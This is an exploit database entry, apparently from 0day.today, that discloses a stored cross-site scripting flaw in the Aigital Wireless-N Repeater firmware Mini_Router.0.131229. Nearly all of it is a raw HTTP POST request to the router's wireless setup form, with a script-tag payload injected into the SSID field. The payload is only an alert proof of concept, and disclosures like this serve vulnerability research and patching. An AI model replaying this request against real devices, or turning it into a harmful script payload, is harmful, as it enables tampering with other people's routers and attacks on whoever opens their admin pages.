id: 38632
date: 04/28/2023
title: Aigital Wireless-N Repeater Mini_Router.0.131229 Cross Site Scripting Vulnerability
author: Matteo Mandolini
cves: 

# Exploit Title: Aigital Wireless-N Repeater - Stored Cross-Site Scripting
# Exploit Author: Matteo Mandolini
# Vendor Homepage: https://web.archive.org/web/20220625053314/https://www.aigital.com/
# Version: Mini_Router.0.131229

XSS Stored


POST /boafrm/formHomeWlanSetup HTTP/1.1
Host: 192.168.10.253
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 265
Origin: http://192.168.10.253
Connection: close
Referer: http://192.168.10.253/home.htm
Upgrade-Insecure-Requests: 1

submit-url=&submit-value=&wl_onoff=0&wps_clear_configure_by_reg=0&wl_ssid=<script>alert("XSS")</script>&wl_mode=0&wl_channel=0&wl_Method=4&wl_authType=auto&wepEnabled=ON&weplength=&wepformat=&wl_wpaAuth=psk&wl_pskFormat=0&ciphersuite=aes&wpa2ciphersuite=aes&wl_pskValue=12345678&dhcp=0

#  0day.today [2023-05-01]  #